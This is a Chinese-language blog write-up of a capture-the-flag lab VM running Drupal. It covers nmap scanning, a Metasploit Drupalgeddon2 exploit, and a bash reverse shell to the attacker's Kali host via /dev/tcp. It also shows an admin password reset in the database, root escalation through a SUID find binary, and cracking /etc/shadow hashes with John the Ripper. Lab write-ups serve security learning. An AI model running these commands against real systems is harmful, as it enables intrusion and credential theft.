前言
- 开启靶机后,需要登录,感觉很真实,接下来是边学边玩吧。
信息搜集
1. 用nmap探测一下信息;
由于不知道靶机的IP地址,毕竟是在虚拟机的靶机,跟kali同一个网段,探测一下同一网段存活的主机。
nmap -sP 192.168.246.0/24ping扫描该网段:
192.168.246.2、254是网关,138是kali的,133就肯定是靶机的地址。
nmap -sV 192.168.246.133探测端口开放与服务信息:
2. 探测到80端口,浏览器打开一下:
一个登录界面,很明显是个Drupal框架的站,下面还有powered by Drupal。
whatweb看下站点的其他信息:
whatweb http://192.168.246.133:80
3. robots.txt里的信息好像没看头。
使用msf框架
1. 直接上手msf
存在这么个CMS,看大佬思路是直接msf查,使用最新的那个:
search drupal
use use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.246.133
exploit
弹回shell:
权限是www-data。
2. 获取flag1.txt
ls查看目录信息看到flag1.txt,cat flag1.txt:
根据flag1.txt提示,config file配置文件,百度:
进入目录找到settings.php文件,获得flag2.txt:
flag2.txt提示:暴力和字典攻击并不是获得访问权限的唯一方法(而且您需要访问权限)你能用这些证件做什么?
3. 查看数据库信息
给出的数据库操作好奇怪,一步一步试,有好多表,感觉只有users和users_roles这两个表看起来有用点。
查看users表的部分信息:
可能是shell问题才会这么鸡肋,弹个交互式的shell:
bash -i > & /dev/tcp/192.168.246.138/8888 0>&1
果然正常多了…
获取到的数据库信息是一样的,但是Hash值密码难以破解,重置密码
复制hash值后在数据库中修改,再登录admin、admin:
在content里发现flag3:
提示是使用-exec,但是需要足够权限。
4. 使用suid提权。
查找符合条件的文件:
find / -perm -u=s -type f 2>/dev/null
如果find以suid权限运行,所有通过find执行的命令都会以root权限运行;
测试一下:
touch xl
find xl -exec whoami \;
执行一个root权限的shell:
find xl -exec '/bin/sh' \;
5. 查看/etc/passwd和/etc/shadow文件:文件详解
/etc/passwd各字段含义:
用户标识号:组标识号:用户名:用户主目录:命令解释程序
/etc/shadow各字段含义:
用户名:密码hash值:最近改动日期:密码不可变更天数:密码过期预警天数:密码过期宽恕天数:账号失效日期:保留的
6. /etc/passwd破解
将flag4的hash值放到shadow.txt文件中,使用John the Ripper破解一下。
7. ssh连接flag4
提示flag在root里。
8. 获取thefinalflag.txt
根据flag4.txt的提示,在root里,在第四步依据取得root权限,查看目录文件后发现最终thefinalflag.txt文件。
总结
- 第一次玩这种靶机,一直迷迷糊糊的百度,看了大佬的思路,学到了。
- 参考文章
3606
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
